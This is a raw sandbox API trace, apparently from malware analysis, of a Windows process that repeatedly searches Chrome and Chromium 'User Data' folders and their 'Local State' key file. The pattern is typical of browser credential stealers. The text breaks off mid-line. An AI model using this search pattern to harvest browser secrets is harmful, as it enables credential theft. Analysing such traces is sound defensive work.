0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.997] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.997] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.997] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.998] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.998] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.998] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.998] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.998] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.998] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.998] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.998] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.998] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.999] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.000] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Chromium\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" [0207.000] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" [0207.000] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State" [0207.000] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\local state")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*") returned 56 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x610074, ftCreationTime.dwLowDateTime=0x650074, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.001] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.001] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.002] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.002] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.003] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.003] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, 